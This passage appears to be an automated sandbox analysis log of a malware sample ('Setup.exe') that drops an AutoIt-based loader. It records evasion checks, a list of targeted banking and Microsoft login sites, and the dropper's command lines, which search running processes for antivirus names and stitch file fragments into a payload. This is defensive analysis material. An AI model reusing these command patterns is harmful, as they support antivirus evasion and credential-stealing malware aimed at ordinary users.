            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7869Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1751Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4247Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2114Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comAPI coverage: 4.3 %
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com TID: 2800Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3128Thread sleep count: 7869 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2296Thread sleep count: 1751 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2412Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep count: 4247 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4592Thread sleep count: 2114 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5144Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1088Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6084Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00574005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00574005
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0057C2FF
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_0057494A
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057CD14 FindFirstFileW,FindClose,10_2_0057CD14
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0057CD9F
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0057F5D8
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0057F735
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0057FA36
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00573CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00573CE2
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00525D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00525D13
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\108941Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\108941\Jump to behavior
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: powershell.exe, 00000011.00000002.2880384967.00000000075EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comAPI call chain: ExitProcess graph end nodegraph_10-97808
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comAPI call chain: ExitProcess graph end nodegraph_10-97913
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005845D5 BlockInput,10_2_005845D5
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00525240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00525240
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00545CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,10_2_00545CAC
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005688CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_005688CD
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0053A354 SetUnhandledExceptionFilter,10_2_0053A354
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0053A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0053A385
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00569369 LogonUserW,10_2_00569369
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00525240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00525240
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00571AC6 SendInput,keybd_event,10_2_00571AC6
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005751E2 mouse_event,10_2_005751E2
            Source: C:\Users\user\Desktop\'Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 108941Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Lines + ..\Edmonton + ..\Characterization + ..\Tampa + ..\Poet + ..\Artwork + ..\Butts + ..\Harbor AJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\108941\Contrast.com Contrast.com AJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005688CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_005688CD
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00574F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00574F1C
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000483F000.00000004.00000800.00020000.00000000.sdmp, Contrast.com, 0000000A.00000000.2061161368.00000000005C6000.00000002.00000001.01000000.00000007.sdmp, Contrast.com.2.dr, Set.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Contrast.comBinary or memory string: Shell_TrayWnd
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0053885B cpuid 10_2_0053885B
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
